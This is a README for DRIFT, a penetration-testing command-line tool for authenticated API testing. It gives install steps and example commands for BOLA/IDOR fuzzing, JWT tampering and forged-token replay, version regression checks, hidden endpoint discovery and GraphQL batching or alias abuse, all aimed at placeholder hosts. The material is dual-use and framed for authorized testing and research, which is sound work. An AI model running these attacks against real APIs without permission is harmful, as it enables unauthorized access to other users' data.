**Differential Recon & Inference Fuzzing Tool**
Authenticated API triage and discovery for penetration testers and researchers
DRIFT is an API security testing CLI built for real-world authenticated testing. It helps you move from a frontend or captured API request to the endpoints that matter, then test them with focused modules for BOLA, version regression, JWT, shadow discovery, and GraphQL.
Most API workflows are fragmented: you discover endpoints in one place, compare responses in another, test authorization in another, then manually stitch everything together in Burp.
DRIFT is built to make that first serious pass faster and cleaner:
- Auth-first workflow — built for real bearer tokens and real API requests
- Low-noise behavior — target-fit gating, catch-all detection, and confidence-aware findings
- Focused modules — BOLA, version regression, JWT, shadow endpoint discovery, and GraphQL
- Manual-review friendly — proxy support for Burp so every lead can be inspected and replayed
- Fingerprinting: fast recon to decide what kind of target you are dealing with
- BOLA / IDOR: object-level fuzzing across multiple ID formats, with optional cross-user comparison
- Version Regression: checks for alternate versions and weaker controls
- JWT Analysis: decoding, attack-surface mapping, tampering, and weak-secret checks
- Shadow Discovery: harvests API routes from JS bundles, common specs, and curated API paths
- GraphQL Testing: introspection, field harvesting, batching, alias abuse, and auth checks
- Confidence-Aware Findings: validated, probable, heuristic, and weak findings to reduce overclaiming
- Python 3.8+
- pip
- Git
git clone https://github.com/bl4ck0wl/drift.git
cd drift
python -m venv venv
# Windows
venv\Scripts\activate
# macOS / Linux
source venv/bin/activate
pip install -r requirements.txt
pip install -e .drift --help
** ***
** * ** *** *
** *** ** *** **
** * ** **
** *** **** ** ********
*** ** **** **** * *** ****** ********
********* ** **** *** ***** **
** **** ** ** ** **
** ** ** ** ** **
** ** ** ** ** **
** ** ** ** ** **
** ** ** ** ** **
** ** *** ** ** **
***** *** *** * ** **
*** *** **
Differential Recon & Inference Fuzzing Tool
Author: bl4ck0wl
Usage:
drift <command> [options]
Commands:
scan Run all DRIFT modules against a target API
bola Deep BOLA/IDOR fuzzing on a specific endpoint
version API version regression discovery and security diff
jwt Full JWT attack suite
shadow Hidden endpoint discovery
graphql GraphQL full attack suite
fingerprint Quick API recon — no attacks, just detection
Global Options:
--no-color Disable ANSI colors
--version Show version and exit
-h, --help Show this help message and exit
scan — Run all DRIFT modules against a target API
-u, --url <url> Target API URL with object ID
-t, --token <token> Auth token (Bearer ...)
-T, --token-b <token> Second token for cross-user BOLA proof
-d, --delay <sec> Delay between requests (default: 0.5)
-p, --proxy <proxy> Proxy URL
-o, --output <file> Output file (.html or .json)
-v, --verbose Verbose output
Example:
drift scan -u https://api.target.com/v2/users/1234 -t "Bearer eyJ..." -T "Bearer eyJ...B" -o report.html
bola — Deep BOLA/IDOR fuzzing on a specific endpoint
-u, --url <url> Endpoint URL containing an object ID
-t, --token <token> Primary auth token
-T, --token-b <token> Second token for cross-user proof
-d, --delay <sec> Delay between requests
-p, --proxy <proxy> Proxy URL
-v, --verbose Show candidate IDs being tested
Example:
drift bola -u https://api.target.com/v2/invoices/INV-9874 -t "Bearer eyJ..." -T "Bearer eyJ...B"
version — API version regression discovery and security diff
-u, --url <url> Target API URL
-t, --token <token> Auth token
-d, --delay <sec> Request delay
-p, --proxy <proxy> Proxy URL
-v, --verbose Show every version being probed
Example:
drift version -u https://api.target.com/v2/admin/users -t "Bearer eyJ..."
jwt — Full JWT attack suite
-t, --token <jwt> JWT token to analyze
-u, --url <url> Target URL to replay forged tokens against
-p, --proxy <proxy> Proxy URL
-v, --verbose Show each attack being attempted
Example:
drift jwt -t "eyJhbGciOiJSUzI1NiJ9..." -u https://api.target.com/v2/admin
shadow — Hidden endpoint discovery
-u, --url <url> Frontend app URL
-t, --token <token> Auth token
-p, --proxy <proxy> Proxy URL
-v, --verbose Show every path being probed
Example:
drift shadow -u https://app.target.com -t "Bearer eyJ..."
graphql — GraphQL full attack suite
-u, --url <url> GraphQL endpoint URL
-t, --token <token> Auth token
-p, --proxy <proxy> Proxy URL
-v, --verbose Show every query being sent
Example:
drift graphql -u https://api.target.com/graphql -t "Bearer eyJ..."
fingerprint — Quick API recon — no attacks, just detection
-u, --url <url> Target URL
-t, --token <token> Auth token for deeper fingerprinting
Example:
drift fingerprint -u https://api.target.com/v2/users/me -t "Bearer eyJ..."
Authorized use only. You must have explicit permission before scanning or probing any target.
drift fingerprint -u https://api.target.com/v2/users/me -t "Bearer eyJ..."drift scan -u https://api.target.com/v2/users/1234 -t "Bearer eyJ..." -o report.htmldrift bola -u https://api.target.com/v2/invoices/INV-9874 -t "Bearer eyJ...ACCOUNT_A..." -T "Bearer eyJ...ACCOUNT_B..."4) Discover hidden API routes from the frontend
drift shadow -u https://app.target.com -t "Bearer eyJ..."drift scan -u https://api.target.com/v2/users/1234 -t "Bearer eyJ..." --proxy http://127.0.0.1:8080MIT License — see LICENSE.
DRIFT is intended for:
- penetration testing with written permission
- bug bounty programs within published scope
- internal application security testing
- research in controlled environments
Always obtain authorization and follow applicable laws and platform rules.